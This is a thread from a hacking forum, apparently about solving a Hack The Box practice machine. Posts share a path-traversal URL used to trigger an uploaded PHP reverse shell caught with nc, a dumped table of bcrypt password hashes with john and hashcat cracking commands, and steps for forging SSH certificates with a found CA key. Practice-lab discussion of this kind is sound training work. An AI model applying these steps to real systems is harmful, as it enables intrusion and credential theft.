Posts: 12
Threads: 0
Joined: Jun 2024
(Aug 05, 2024, 03:01 PM)yolodolo Wrote: (Aug 04, 2024, 06:31 AM)glock05 Wrote: (Aug 04, 2024, 06:28 AM)Lucifer097 Wrote: (Aug 04, 2024, 06:14 AM)glock05 Wrote: (Aug 04, 2024, 06:08 AM)b2synapse Wrote: Where can i find the tmp/hello.php?
help mine shell isn't rolled back
GET /index.php/?page=../../../../../../../../tmp/hello
listen with nc
visit /index.php/?page=../../../../../../../../tmp/hello
i m not getting the shell back. encoded the payload uploaded it and then visisted /tmp/hello I heard someone saying they patched the thinkPHP RCE
Posts: 26
Threads: 0
Joined: Apr 2024
i have acces to support@ssg and zzinter@itrc and try to get the key for zzinter@ssg.
I'm running this command on zzinter@itrc:
ssh-keygen -f zzinter
chmod 600 zzinter
bash sign_key_api.sh zzinter.pub zzinter_temp support
login with this key does not work.. obviously I'm doing something wrong - can someone help me? This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Posts: 24
Threads: 2
Joined: Jun 2024
(Aug 05, 2024, 07:19 PM)ipfi Wrote: i have acces to support@ssg and zzinter@itrc and try to get the key for zzinter@ssg.
I'm running this command on zzinter@itrc:
ssh-keygen -f zzinter
chmod 600 zzinter
bash sign_key_api.sh zzinter.pub zzinter_temp support
login with this key does not work.. obviously I'm doing something wrong - can someone help me?
Yes, it's wrong. Don't use script, cuz you can not use zzinter_temp from it. Use curl from script, username should be "zzinter" and principal should be "zzinter_temp".
Posts: 12
Threads: 1
Joined: Aug 2024
Aug 06, 2024, 01:10 AM
(This post was last modified: Aug 06, 2024, 01:11 AM by userpowerranger.)
(Aug 05, 2024, 07:47 PM)wh1t3_r4bb1t Wrote: (Aug 05, 2024, 07:19 PM)ipfi Wrote: i have acces to support@ssg and zzinter@itrc and try to get the key for zzinter@ssg.
I'm running this command on zzinter@itrc:
ssh-keygen -f zzinter
chmod 600 zzinter
bash sign_key_api.sh zzinter.pub zzinter_temp support
login with this key does not work.. obviously I'm doing something wrong - can someone help me?
Yes, it's wrong. Don't use script, cuz you can not use zzinter_temp from it. Use curl from script, username should be "zzinter" and principal should be "zzinter_temp".
I’m very grateful for your help, but how do I come to the conclusion of being zzinter_temp?
I’m very grateful for your help, but how do I come to the conclusion of being zzinter_temp?
Posts: 59
Threads: 0
Joined: Sep 2023
(Aug 05, 2024, 05:08 PM)sanish11 Wrote: (Aug 04, 2024, 06:07 AM)bestmajor Wrote: +---------------------+--------------------------------------------------------------+
| user | password |
+---------------------+--------------------------------------------------------------+
| zzinter | $2y$10$VCpu.vx5K6tK3mZGeir7j.ly..il/YwPQcR2nUs4/jKyUQhGAriL2 |
| msainristil | $2y$10$AT2wCUIXC9jyuO.sNMil2.R950wZlVQ.xayHZiweHcIcs9mcblpb6 |
| mgraham | $2y$10$4nlQoZW60mVIQ1xauCe5YO0zZ0uaJisHGJMPNdQNjKOhcQ8LsjLZ2 |
| kgrant | $2y$10$pLPQbIzcehXO5Yxh0bjhlOZtJ18OX4/O4mjYP56U6WnI6FvxvtwIm |
| bmcgregor | $2y$10$nOBYuDGCgzWXIeF92v5qFOCvlEXdI19JjUZNl/zWHHX.RQGTS03Aq |
| cgxllxtxbr | $2y$10$dhWgauaX5rWlSMFBC1e2dedv0ePpBDtBOY7eVkcI2npSjsNt0hvB2 |
| ucvjlpbfnn | $2y$10$VCZJdE/UWFmGMG7/vo725.jgvv1oyrqwYtAkKnlK91wT4zmLoeBpm |
| cozapndgfj | $2y$10$DdSbELDiuxPH3Uvfqn/dlegaGQ3VtAOICyXGTVeoKNptdL8r90H7y |
+---------------------+--------------------------------------------------------------+
how to craack it is nt cracking why You can use
john --format=bcrypt hashes.txt
or
hashcat -m 3200 hashes.txt This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Replying With Hidden Content
Posts: 6
Threads: 0
Joined: Aug 2024
Aug 06, 2024, 09:23 AM
(This post was last modified: Aug 06, 2024, 09:53 AM by MrNidus.)
i cant even register a user
WTF, i have access to user and root flags, i put the user one in htb and denies it...i restared the machine and yet it fails
WTF, i have access to user and root flags, i put the user one in htb and denies it...i restared the machine and yet it fails
Posts: 5
Threads: 0
Joined: Aug 2024
(Aug 05, 2024, 05:56 PM)glock05 Wrote: (Aug 05, 2024, 03:01 PM)yolodolo Wrote: (Aug 04, 2024, 06:31 AM)glock05 Wrote: (Aug 04, 2024, 06:28 AM)Lucifer097 Wrote: (Aug 04, 2024, 06:14 AM)glock05 Wrote: help mine shell isn't rolled back
GET /index.php/?page=../../../../../../../../tmp/hello
listen with nc
visit /index.php/?page=../../../../../../../../tmp/hello
i m not getting the shell back. encoded the payload uploaded it and then visisted /tmp/hello I heard someone saying they patched the thinkPHP RCE
aah nvm got the user, far from root tho
Posts: 36
Threads: 0
Joined: Mar 2024
(Aug 06, 2024, 04:17 AM)bananoname Wrote: (Aug 05, 2024, 05:08 PM)sanish11 Wrote: (Aug 04, 2024, 06:07 AM)bestmajor Wrote: +---------------------+--------------------------------------------------------------+
| user | password |
+---------------------+--------------------------------------------------------------+
| zzinter | $2y$10$VCpu.vx5K6tK3mZGeir7j.ly..il/YwPQcR2nUs4/jKyUQhGAriL2 |
| msainristil | $2y$10$AT2wCUIXC9jyuO.sNMil2.R950wZlVQ.xayHZiweHcIcs9mcblpb6 |
| mgraham | $2y$10$4nlQoZW60mVIQ1xauCe5YO0zZ0uaJisHGJMPNdQNjKOhcQ8LsjLZ2 |
| kgrant | $2y$10$pLPQbIzcehXO5Yxh0bjhlOZtJ18OX4/O4mjYP56U6WnI6FvxvtwIm |
| bmcgregor | $2y$10$nOBYuDGCgzWXIeF92v5qFOCvlEXdI19JjUZNl/zWHHX.RQGTS03Aq |
| cgxllxtxbr | $2y$10$dhWgauaX5rWlSMFBC1e2dedv0ePpBDtBOY7eVkcI2npSjsNt0hvB2 |
| ucvjlpbfnn | $2y$10$VCZJdE/UWFmGMG7/vo725.jgvv1oyrqwYtAkKnlK91wT4zmLoeBpm |
| cozapndgfj | $2y$10$DdSbELDiuxPH3Uvfqn/dlegaGQ3VtAOICyXGTVeoKNptdL8r90H7y |
+---------------------+--------------------------------------------------------------+
how to craack it is nt cracking why You can use
john --format=bcrypt hashes.txt
or
hashcat -m 3200 hashes.txt it is not working This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 47
Threads: 1
Joined: Jan 2024
Posts: 59
Threads: 0
Joined: Sep 2023
Aug 07, 2024, 02:51 AM
(This post was last modified: Aug 07, 2024, 02:56 AM by bananoname.)
(Aug 06, 2024, 10:37 PM)notluken Wrote: i'm stuck at msainristil
In user msainristil, you see the folder. and then you use the command to change the directory in decommission_old_ca. Use command:
ssh-keygen -t rsa -b 2048 -f keypair
This will create keypair and keypair.pub files. Now we have to sign this with ca-itrc
ssh-keygen -s ca-itrc -n zzinter -I doesntmatter keypair.pub
And after that, you copy all files into your machine. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Replying With Hidden Content
|
